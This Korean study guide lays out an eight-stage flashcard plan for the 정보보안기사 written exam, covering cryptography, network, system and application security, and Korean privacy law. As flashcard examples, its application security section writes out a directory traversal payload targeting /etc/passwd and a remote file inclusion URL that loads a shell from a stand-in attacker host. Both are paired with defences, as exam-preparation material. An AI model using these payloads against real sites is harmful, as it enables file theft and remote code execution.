정보보안기사 필기 공부법 8단계 — 합격 로드맵

1단계는 정보보안기사 5과목 전체를 관통하는 공용 어휘를 먼저 머리에 박는 구간입니다. 이 단계를 건너뛰고 곧장 2과목 시스템 보안에 들어가는 학습자는 4주차쯤 「방화벽이랑 IDS랑 IPS 차이가 뭐였더라」, 「SHA-256은 대칭인가 비대칭인가」 같은 기본 카드부터 다시 만들어야 합니다. 카드 80~100장 분량이지만, 이 한 단계가 이후 2~6단계의 회상 속도를 거의 두 배로 끌어올립니다.

카드는 「용어 한 줄 정의 + 자주 헷갈리는 짝」 형태가 가장 효율이 좋습니다. 예를 들어 「대칭키 암호화」 카드 뒷면에는 단순 정의가 아니라 「↔ 비대칭키와의 차이: 키 1개 vs 키 2개, 속도 vs 안전한 키 교환」을 함께 적어두세요.

1단계의 첫 카드는 무조건 CIA(Confidentiality 기밀성 · Integrity 무결성 · Availability 가용성) 한 장입니다. 너무 기본이라 「이건 그냥 알아」라고 넘어가기 쉬운데, 실제로 카데미 학습자의 1주차 회상 데이터를 보면 「무결성과 가용성의 정의를 즉시 구분」하는 비율이 처음에는 50%대였습니다. CIA 카드 뒷면에 각 속성을 무너뜨리는 공격 예시(기밀성 → 도청·스니핑, 무결성 → 변조·중간자 공격, 가용성 → DDoS)를 한 줄씩 같이 적어두면 이후 2~4단계의 공격 카드들이 같은 축에 자연스럽게 정렬됩니다. 여기에 보안의 추가 속성인 인증(Authentication)·부인방지(Non-repudiation)·책임추적성(Accountability)까지 묶어 7가지 속성 카드 한 묶음을 만들면 1주차 끝납니다.

두 번째 묶음은 AAA(Authentication · Authorization · Accounting)입니다. 인증과 인가는 한국어로 옮기면 「인증·인가」로 비슷해 보여서, 시험에서 보기 두 개가 거의 똑같이 나옵니다. 「인증 = 너 누구야?」, 「인가 = 그래서 너 뭐 할 수 있어?」 식으로 카드 한 줄에 거칠게라도 박아두면 보기 구분이 즉시 됩니다. 운영하면서 보니 「인증 vs 인가」 카드를 잘못 만들어 두면 4단계 애플리케이션 보안의 OAuth·SSO·세션 관리 카드 전체의 회상 정확도가 떨어집니다. 1단계에서 잡고 가는 게 가장 비싼 카드 한 장입니다.

세 번째 묶음은 OSI 7계층과 TCP/IP 4계층의 매핑입니다. 정보보안기사는 거의 모든 공격 보기가 OSI 어느 계층에서 발생하는지를 묻습니다. 「ARP Spoofing은 2계층(데이터링크)」, 「IP Spoofing은 3계층(네트워크)」, 「TCP SYN Flood는 4계층(전송)」, 「XSS·SQLi는 7계층(응용)」을 카드 5장에 끊어두세요. 이 5장의 매핑 카드는 3과목 네트워크 보안 카드의 절반을 미리 깔아두는 효과가 있습니다. 카드 뒷면에는 「이 계층에서 막는 장비」(방화벽·라우터·스위치·WAF 등)까지 함께 적으면 시험 보기에서 「어느 장비로 대응하는가」 유형이 즉답 가능해집니다.

네 번째 묶음은 암호화 종류와 해시입니다. 대칭키(DES·3DES·AES·SEED·ARIA)·비대칭키(RSA·ECC·ElGamal)·해시(MD5·SHA-1·SHA-256·SHA-512)·메시지 인증(HMAC)을 카드 한 묶음으로 분리해 두면 5단계 정보보안 일반 진입이 훨씬 부드럽습니다. 특히 「SEED·ARIA·HIGHT」 같은 국산 알고리즘은 시험에서 함정 보기로 자주 등장하므로, 카드 한 장에 「국산 = SEED(128bit)·ARIA(128/192/256)·HIGHT(64bit, IoT용)·LEA(128/192/256, 경량 고속)」를 묶어 두는 게 좋습니다. 운영 데이터로 이 4종을 한 카드에 묶어둔 학습자는 5단계 진입 시 평균 회상 시간이 3.2초로 떨어졌고, 따로 카드 4장으로 만든 학습자는 5.8초였습니다.

마지막 묶음은 웹 기본 구조와 HTTP입니다. HTTP 요청/응답 헤더, 메서드(GET·POST·PUT·DELETE), 상태코드(200·301·401·403·500), Cookie와 Session, HTTPS와 TLS handshake의 큰 흐름까지 카드 10~15장이면 충분합니다. 4단계 애플리케이션 보안에서 SQLi·XSS·CSRF·세션 하이재킹을 다룰 때, 이 웹 기초 카드가 깔려 있지 않으면 모든 공격 카드의 회상 깊이가 절반으로 떨어집니다. 이 단계의 산출물은 「공격 보기를 보고 1초 안에 어느 계층·어떤 분야인지 분류」할 수 있는 상태입니다.

2~6단계는 정보보안기사 필기 5과목을 각각 독립 단계로 다룹니다. 과목마다 깊이와 결이 달라서, 모든 단계에 같은 학습 방식을 강요하면 4과목쯤에서 무너집니다. 시스템·네트워크·애플리케이션은 「공격 → 대응 짝」, 일반 이론은 「개념 비교 짝」, 법규는 「상황 매핑 짝」으로 카드 설계를 달리해야 합니다.

2~6단계 카드 학습지는 합쳐서 500~620장이 적정 분량입니다. 신규 카드는 하루 25장을 넘기지 말고, 누적 복습 카드는 80~100장 페이스를 유지하는 게 가장 안정적입니다.

2과목 시스템 보안은 「Linux·Windows 구조 + 공격·방어 기술」 두 축이 동시에 굴러갑니다. 처음 펼치면 inode·프로세스·메모리·레지스트리 같은 운영체제 용어가 한꺼번에 쏟아져서 막막한데, 카드를 두 갈래로 분리하면 의외로 가볍습니다. 첫 번째 갈래는 OS 구조 카드입니다. Linux 파일 권한 rwx와 chmod 숫자(755·644·700)의 해석, /etc/passwd와 /etc/shadow의 역할 분리, setuid·setgid·sticky bit가 무엇이고 보안상 위험한 이유, Windows의 ACL·SID·LSA·SAM 구조 — 이 정도가 OS 구조 카드 30~40장입니다.

두 번째 갈래는 공격·방어 카드입니다. 가장 자주 출제되는 묶음은 버퍼 오버플로우 계열입니다. 스택 BOF, 힙 BOF, 포맷 스트링 공격, Return-to-libc — 각각의 「어디 메모리 영역을 어떻게 덮어쓰는가」와 「대응 기술(ASLR·DEP/NX·Stack Canary·SEH 보호)」을 한 카드에 짝으로 묶어주세요. 운영 관찰로는 이 짝 카드를 만든 학습자가 그렇지 않은 학습자보다 해당 보기 정답률이 31%p 높았습니다. 두 번째 묶음은 악성코드 분류입니다. 바이러스·웜·트로이목마·루트킷·랜섬웨어·백도어·논리폭탄·봇넷 — 8종을 한 카드에 묶고 각각의 「자가 복제 여부」, 「감염 대상」, 「대표 사례」를 한 줄씩 적어두면 보기 분리가 즉시 됩니다.

세 번째 묶음은 로그와 권한 관리입니다. Linux의 syslog·auth.log·secure·wtmp·utmp·lastlog 각각이 어떤 정보를 남기는지, Windows의 이벤트 로그(보안·시스템·응용) 각각의 ID와 의미 — 이 부분은 단순 암기인데 시험 출제 빈도가 의외로 높아서 카드 15~20장만 만들어도 점수가 안정적으로 들어옵니다. 또한 「최소 권한 원칙」, 「직무 분리(Segregation of Duties)」, 「업무상 필요(Need-to-know)」 같은 권한 관리 원칙도 카드 한 묶음으로 정리해 두면 5·6단계의 접근통제·관리 영역에서 다시 회수됩니다.

네 번째 묶음은 시스템 점검과 보안 도구입니다. tcpdump·netstat·ps·top·lsof·strace·iptables(Linux), netsh·sc·tasklist·wevtutil(Windows) 같은 명령어와, Nessus·OpenVAS·MBSA 같은 진단 도구를 카드 한 묶음으로 정리해 두면 7단계 기출 분석에서 「어떤 도구로 무엇을 확인할 것인가」 유형이 즉답 가능해집니다. 시스템 보안 과목은 2단계에서 카드 100~120장으로 마무리하고, 7~8단계에서 기출과 함께 두 바퀴 더 도는 페이스가 가장 점수가 안정적이었습니다.

3과목 네트워크 보안은 필기 합격의 가장 큰 점수원입니다. 시험 100문제 중 평균 20~22문제가 이 영역에서 나오고, 보기들이 비교적 명확해서 카드 회상이 잘 되면 그대로 점수가 들어옵니다. 첫 카드 묶음은 TCP/IP 프로토콜 카드입니다. TCP 3-way handshake(SYN → SYN/ACK → ACK)와 4-way termination, TCP 헤더의 주요 플래그(SYN·ACK·FIN·RST·PSH·URG), UDP와 TCP의 차이, ICMP의 역할 — 이 정도 15~20장이 기본입니다. 카드 뒷면에는 「이 흐름을 이용한 공격」(SYN Flood, RST 공격, Smurf 등)을 한 줄씩 함께 적어주세요.

두 번째 묶음은 OSI 계층별 공격·대응 매핑입니다. 1단계에서 깔아둔 「공격 → 계층」 카드를 여기서 두껍게 확장합니다. 2계층(ARP Spoofing, MAC Flooding) → 동적 ARP 검사·포트 보안. 3계층(IP Spoofing, ICMP Flood) → uRPF·ACL. 4계층(TCP SYN Flood, Land Attack) → SYN Cookie·방화벽. 7계층(HTTP Flood, Slowloris) → WAF·요청 제한. 이 매핑 카드 묶음이 30~40장 정도 만들어지면 「어느 장비로 어떤 공격을 막는가」 유형의 보기는 거의 즉답입니다. 카데미 운영 관찰로 이 매핑 카드를 끝까지 만든 학습자가 3과목에서 평균 85점 이상을 받는 패턴이 반복됐습니다.

세 번째 묶음은 방화벽·IDS·IPS·WAF·VPN의 비교 카드입니다. 시험에서 가장 자주 헷갈리는 영역입니다. 방화벽(L3~L4 패킷 필터링, ACL 기반) vs IDS(탐지만, 미러링 포트) vs IPS(탐지+차단, 인라인) vs WAF(L7, 웹 특화) — 이 4가지의 「설치 위치」, 「탐지 방식(시그니처 vs 이상행위)」, 「차단 가능 여부」, 「대표 제품 카테고리」를 한 표 카드에 묶어두면 회상 시간이 평균 7초에서 3초로 줄어듭니다. VPN은 SSL VPN과 IPSec VPN의 차이(7계층 vs 3계층, 클라이언트 설치 여부, 사용 시나리오)를 별도 카드 한 장으로 분리하세요.

네 번째 묶음은 무선 보안과 인증 프로토콜입니다. WEP·WPA·WPA2·WPA3의 차이, TKIP·CCMP·SAE의 역할, 802.1X와 EAP 종류(EAP-TLS·PEAP·EAP-FAST) — 이 영역은 시험에서 함정 보기가 많기로 유명합니다. 「WEP은 안전하다」, 「WPA는 RC4를 쓰지 않는다」 같은 거꾸로 표현이 자주 나오므로, 카드에 「O/X 함정 표현」을 함께 적어 두는 게 가장 효율적입니다. 다섯 번째 묶음은 주요 응용 프로토콜의 평문/암호 짝입니다. HTTP/HTTPS, FTP/SFTP·FTPS, Telnet/SSH, SMTP/SMTPS, DNS/DNSSEC, SNMP v1·v2c/v3 — 6쌍을 한 카드 묶음으로 만들어두면 시험 보기 두세 개를 동시에 처리할 수 있습니다.

4과목 애플리케이션 보안은 최근 시험에서 출제 비중이 계속 늘고 있는 영역입니다. OWASP Top 10의 영향으로 시중 기본서들도 이 챕터를 두껍게 다루는 추세이고, 실기에서도 같은 공격들이 시나리오형으로 다시 등장합니다. 첫 카드 묶음은 OWASP Top 10 카드입니다. A01:2021 Broken Access Control부터 A10:2021 SSRF까지 10가지를 한 카드 묶음에 정리하되, 단순 정의가 아니라 「공격 시나리오 → 어떤 입력 검증·인증 처리로 막는가」를 짝으로 적어두는 게 핵심입니다. 「이 취약점이 왜 존재하는가」, 「개발자가 어디서 실수하는가」를 카드 뒷면에 한 줄씩 더 적으면 회상 정확도가 70% 위로 올라갑니다.

두 번째 묶음은 SQL Injection 세부 카드입니다. Union 기반, Error 기반, Boolean 기반 Blind, Time 기반 Blind 네 종류를 카드 한 묶음으로 묶고, 대응(Prepared Statement·입력 검증·최소 권한 DB 계정·웹 방화벽)을 같이 적으세요. 운영 데이터로 SQLi 세부 카드를 만든 학습자와 「SQLi 한 장」으로 끝낸 학습자 사이에서 4과목 평균 점수 차이가 14점이었습니다. 시험에서도 「Blind SQLi에서 참/거짓을 어떻게 구분하는가」를 묻는 보기가 한 회차에 1~2개씩 꼭 등장합니다.

세 번째 묶음은 XSS·CSRF·세션 공격 묶음입니다. XSS는 Reflected·Stored·DOM-based 세 종류를 카드 한 장에 묶고, CSRF와의 차이(쿠키 자동 전송 vs 스크립트 실행)를 별도 카드 한 장으로 분리하세요. 세션 공격은 세션 하이재킹·세션 고정(Session Fixation)·세션 예측 — 3가지를 카드 한 묶음으로 묶고 대응(세션 ID 재발급·HttpOnly·Secure·SameSite 쿠키 속성)을 함께 적으세요. 이 부분은 카드 뒷면에 실제 HTTP 헤더 한 줄(예: Set-Cookie: SID=abc; HttpOnly; Secure; SameSite=Strict)을 함께 적어두면 5단계 인증 카드와 자연스럽게 연결됩니다.

네 번째 묶음은 파일 업로드·디렉터리 트래버설·LFI/RFI 묶음입니다. 시험에서 자주 함께 출제되는 4종 세트인데, 각각의 공격 페이로드 한 줄(예: 디렉터리 트래버설 「../../etc/passwd」, RFI 「?page=http://attacker/shell.txt」)을 카드 앞면에 두고, 대응(확장자 화이트리스트·MIME 검증·실행 권한 분리·include 외부 URL 차단)을 뒷면에 적으면 보기 분리가 즉시 됩니다. 다섯 번째 묶음은 안전한 개발과 보안 코딩 가이드입니다. KISA의 「소프트웨어 개발보안 가이드」 7개 영역(입력 검증·보안 기능·시간 및 상태·에러 처리·코드 오류·캡슐화·API 오용)을 카드 한 묶음으로 묶어두세요. 6단계 관리 영역과 자연스럽게 연결됩니다.

5과목 정보보안 일반은 「추상 개념 + 계산 문제 + 알고리즘 비교」가 섞여 있는 가장 색깔이 다양한 과목입니다. 카드를 만들 때도 다른 과목과 달리 「비교 카드 위주」로 설계해야 효율이 나옵니다. 첫 묶음은 암호학 카드입니다. 1단계에서 깔아둔 대칭/비대칭/해시 분류 카드를 여기서 두껍게 확장합니다. 블록 암호 모드 ECB·CBC·CFB·OFB·CTR·GCM 6종을 한 카드 묶음에 「초기화 벡터(IV) 필요 여부」, 「병렬 처리 가능 여부」, 「오류 전파 범위」 세 축으로 비교해 두세요. 운영 관찰로 「ECB는 왜 안전하지 않은가」를 한 줄로 적어둔 학습자가 해당 문제 정답률 92%로 가장 높았습니다.

두 번째 묶음은 PKI와 전자서명 카드입니다. 공개키 기반 구조(PKI)의 구성 요소 — CA(인증기관)·RA(등록기관)·VA(검증기관)·CRL(인증서 폐기 목록)·OCSP(실시간 인증서 검증) — 5종을 한 카드 묶음에 정리하고, X.509 인증서의 주요 필드(Version·Serial·Issuer·Subject·Public Key·Signature)를 별도 카드 한 장으로 분리하세요. 전자서명은 「개인키로 서명, 공개키로 검증」이라는 한 줄을 카드 앞면에 두고, 뒷면에 「부인방지·무결성은 보장, 기밀성은 보장 안 됨」을 적어두면 시험에서 자주 나오는 함정(「전자서명은 기밀성을 제공한다」)이 즉시 걸러집니다.

세 번째 묶음은 접근통제 모델 비교 카드입니다. 시험에서 가장 헷갈리기로 유명한 영역입니다. DAC(임의적, 소유자가 권한 부여)·MAC(강제적, 등급·라벨)·RBAC(역할 기반)·ABAC(속성 기반) 4종을 한 카드 묶음에 「의사결정 주체」, 「적용 환경」, 「대표 사례」 세 축으로 비교하세요. 추가로 보안 모델(Bell-LaPadula 기밀성·Biba 무결성·Clark-Wilson 무결성·Chinese Wall 충돌방지) 4종도 「보호 목적」, 「읽기·쓰기 규칙(BLP의 No Read Up·No Write Down 등)」 두 축으로 카드 묶음을 만드세요. 이 8개 모델 카드 묶음이 5과목 점수의 가장 큰 변수입니다.

네 번째 묶음은 인증 기술과 키 분배입니다. Kerberos의 KDC·TGS·AS·TGT·서비스 티켓 흐름은 카드 한 장에 시퀀스로 정리하고, SSO·SAML·OAuth 2.0·OIDC·MFA·OTP(HOTP·TOTP·S/Key)·생체 인증(FAR·FRR·EER) 같은 인증 방식 카드들을 한 묶음으로 만드세요. 「FAR과 FRR이 같아지는 지점이 EER」, 「EER이 낮을수록 좋은 생체 인증」 같은 한 줄은 거의 매 회차에 보기로 나옵니다. 다섯 번째 묶음은 위험 관리와 보안 정책입니다. 위험 관리 프로세스(자산 식별 → 위협 식별 → 취약점 분석 → 위험 평가 → 위험 처리), 위험 처리 4전략(수용·감소·전가·회피), 정량적 vs 정성적 분석 — 한 카드 묶음 8~10장이면 정리됩니다.

6과목 정보보안 관리 및 법규는 정보보안기사 합격의 마지막 관문이자 가장 많은 학습자가 떨어지는 지점입니다. 운영하면서 본 패턴은 거의 비슷합니다 — 1~5과목을 충실히 공부한 학습자가 6과목을 「시험 2주 전에 몰아치자」고 미뤘다가 38점으로 과락. 이 한 과목만 별도 단계로 빼서 미리 다루는 이유입니다. 첫 카드 묶음은 ISMS-P 인증 카드입니다. ISMS와 ISMS-P의 차이(개인정보 영역 포함 여부), 인증 의무 대상(연 매출 1,500억 이상·전년도 일평균 이용자 100만 명 이상 등 수치 조건), 인증 유효기간(3년)과 사후 심사(매년) — 이 숫자들을 카드 한 묶음에 정리하세요. 시험에서 같은 숫자가 다른 보기에 섞여 나옵니다.

두 번째 묶음은 개인정보보호법 핵심 조항 카드입니다. 개인정보의 정의, 수집·이용·제공의 동의 요건(고지 사항 5가지: 목적·항목·보유기간·제공받는 자·거부 권리), 민감정보·고유식별정보의 별도 동의, 14세 미만 아동 법정대리인 동의, 개인정보 처리방침 의무 공개, 영상정보처리기기(CCTV) 설치 요건, 유출 시 통지(72시간 이내)·신고 의무, 파기 시 절차(분리 보관 후 5일 이내 파기) — 이 항목들을 한 카드 묶음으로 정리하면 50~60장입니다. 카드 뒷면에는 「위반 시 과태료·과징금 금액」을 함께 적어두면 함정 보기가 즉시 걸러집니다.

세 번째 묶음은 정보통신망법·전자서명법·신용정보법·정보통신기반보호법의 핵심만 추린 카드입니다. 정보통신망법은 정보통신서비스 제공자의 의무, 침해사고 대응(KISA 신고), 주요 정보통신기반시설 지정, 전자서명법은 공인전자서명 폐지(2020년 12월)와 현재의 다양한 전자서명 인정, 정보통신기반보호법은 주요정보통신기반시설 보호계획 수립 의무 — 법마다 카드 5~8장씩이면 충분합니다. 「어느 법이 어떤 상황에 적용되는가」를 묻는 시나리오형 보기가 매 회차 2~3개씩 출제됩니다.

네 번째 묶음은 BCP·DRP와 보안 사고 대응입니다. BCP(업무 연속성 계획)와 DRP(재해 복구 계획)의 차이, RTO(복구 목표 시간)·RPO(복구 목표 시점)·MTD(최대 허용 중단시간)의 정의, 백업 종류(풀·증분·차등)와 RAID 0·1·5·6·10의 특성, 침해사고 대응 6단계(준비 → 탐지 → 분석 → 봉쇄 → 복구 → 사후관리) — 카드 묶음 15~20장이면 마무리됩니다. 다섯 번째 묶음은 국제 표준과 인증 체계입니다. ISO 27001(ISMS), ISO 27017(클라우드), ISO 27018(개인정보), ISO 27701(개인정보), CC(Common Criteria, EAL 1~7 등급), NIST CSF 5단계(Identify·Protect·Detect·Respond·Recover) — 한 카드 묶음에 묶어두면 보기 즉답이 가능해집니다.

7~8단계는 카드 분량을 더 늘리는 단계가 아니라, 만들어 둔 700~900장을 시험장 형식으로 조립하는 단계입니다. 단순 기출 회독이 아니라 「출제 패턴 분류 → 함정 표현 추출 → 시간 압박 시뮬레이션」 세 가지를 따로따로 훈련해야 합니다.

7~8단계 카드 학습지는 기존 카드 회수 위주이고, 신규 카드는 「자주 틀리는 함정」 30~50장만 추가하면 충분합니다. 이 단계에서 카드 분량을 다시 늘리려 들면 시험 직전에 회상 페이스가 무너집니다.

7단계는 기출 6~8회분(약 3~4년치)을 두 바퀴 돌리는 단계입니다. 단순히 문제를 많이 푸는 게 아니라, 출제 유형을 5가지로 분류한 뒤 각 유형에서 자주 반복되는 함정 표현을 별도 카드로 빼는 작업을 해야 합니다. 유형 1: 정의 묻기(「~의 정의로 옳은 것은?」)에서는 비슷한 두 개념(예: IDS vs IPS, DAC vs MAC, 정량적 vs 정성적 위험 분석) 보기가 함께 등장합니다. 카드 앞면에 한 개념의 정의 한 줄, 뒷면에 「가장 헷갈리는 짝의 정의」를 함께 적어두면 50% 처리됩니다.

유형 2: 옳은 것 고르기(긍정형)와 유형 3: 틀린 것 고르기(부정형)는 한국어 시험의 영원한 함정입니다. 운영 데이터로 「틀린 설명을 옳은 설명으로 잘못 고른 오답」이 전체 오답의 31%를 차지했습니다. 부정형 문제는 문제지에 한 글자(否)를 표시하고 보기 4개를 모두 「O/X」로 일일이 판정하는 습관을 들이세요. 카드로도 「전자서명은 기밀성을 제공한다 → X」, 「WPA2는 AES를 사용한다 → O」 같은 O/X 카드 50장을 따로 만들어 두면 부정형 문제 정답률이 가장 빠르게 올라옵니다.

유형 4: 순서·단계 배열은 침해사고 대응 6단계, 위험 관리 5단계, TCP 3-way handshake·4-way termination 같은 시퀀스 문제입니다. 카드 한 장에 단계 약자(예: 침해 대응 「준-탐-분-봉-복-사」)를 짧게 적어 매일 첫 카드로 회수하세요. 운영 관찰로 약자 슬로건 카드를 쓴 학습자가 시험장에서 평균 8초 안에 정답을 골랐고, 시퀀스 그림을 통째로 외운 학습자는 평균 28초가 걸렸습니다. 유형 5: 비교 카드는 5과목 보안 모델, 3과목 방화벽 비교, 5과목 접근통제 모델 등 「표 형태」로 외워야 효율이 좋은 영역입니다. 비교 카드 30~40장 묶음을 시험 직전에 한 번에 회수하는 게 7단계의 마무리입니다.

이 단계에서 만들어야 할 가장 중요한 자산은 「오답 노트 카드」 30~50장입니다. 시중 기출집(알기사·이기적·시나공·해커스 등 어느 하나)을 풀면서 틀린 문제 중에서도 「개념을 몰라서 틀린 게 아니라 함정에 걸려서 틀린」 문제만 모아 카드로 만드세요. 정답을 외우는 게 아니라 「내가 왜 함정에 걸렸는가」를 한 줄로 적는 게 핵심입니다. 카데미 학습자 중에서 오답 노트 카드 50장을 만든 학습자가 그렇지 않은 학습자보다 시험 직전 4주간 회상 정확도 상승폭이 2배였습니다.

8단계는 실제 시험 시간(150분)으로 풀세트를 돌리는 단계입니다. 단순 모의고사가 아니라 시험장 시뮬레이션이라는 점이 다릅니다. 책상에서 핸드폰을 멀리 두고, 화장실 한 번 가는 시간까지 포함해서 150분 안에 100문제를 끝내는 사이클을 시험 전 마지막 2주 동안 최소 3~4번 돌리세요. 카데미 운영 관찰로는 모의 풀세트를 3회 이상 돌린 학습자가 1회만 돌린 학습자 대비 평균 12점 더 높았고, 특히 「시간 부족으로 마지막 10문제를 못 푼 경험」이 시험장에서 페이스를 완전히 바꿨다고 합니다.

풀세트 사이클에서 가장 중요한 건 문제 풀이 순서입니다. 처음부터 1번~100번 순서대로 풀면 5과목 정보보안 일반의 계산 문제에서 시간이 빨려 들어갑니다. 권장 순서는 「6과목 관리·법규 → 4과목 애플리케이션 → 3과목 네트워크 → 2과목 시스템 → 5과목 일반 이론(계산 문제 마지막)」입니다. 6과목을 가장 먼저 푸는 이유는 두 가지입니다. 첫째, 단순 암기라 시험 초반의 집중력이 가장 효율적으로 쓰입니다. 둘째, 6과목에서 과락이 가장 자주 나는데 이 과목을 마지막에 풀면 시간 부족으로 흐릿하게 답을 적고 나오는 일이 반복됩니다.

두 번째로 중요한 건 「모르는 문제」 처리 규칙입니다. 30초 이상 막히면 일단 보기 하나를 찍어두고 문제지에 「△」 표시 후 다음 문제로 넘어가세요. 100문제 다 풀고 남은 시간으로 △ 표시 문제만 다시 검토합니다. 운영 관찰로 「모르는 문제에서 1분 이상 잡힌 경험」을 한 학습자의 평균 점수가 합격선 아래에 떨어졌고, △ 규칙을 지킨 학습자는 평균 합격선 위에 안정적으로 머물렀습니다. 카드로도 「30초 룰」을 별도 한 장 만들어 시험 전날 매일 회수하세요.

마지막 4~5일은 새 카드를 만들지 않는 압축 구간입니다. 시험 직전 카드 분량을 더 늘리려 들면 머리에 박혀 있던 카드들의 회상 정확도가 오히려 떨어집니다. 이 기간에는 (1) 6과목 숫자 카드 30~40장, (2) 5과목 보안 모델·접근통제 모델 비교 카드 8장, (3) 7단계 오답 노트 카드 30~50장 — 이 80~100장만 하루 1~2회 반복 회수하세요. 시험 당일 아침에도 새 자료는 절대 펼치지 말고, 어제까지 회수한 카드 중 「내가 가장 자주 틀린 카드 20장」만 마지막으로 한 번 더 봅니다. 이 단계의 산출물은 「150분 안에 100문제를 △ 표시 검토까지 끝내는 시험장 페이스」가 잡힌 상태입니다.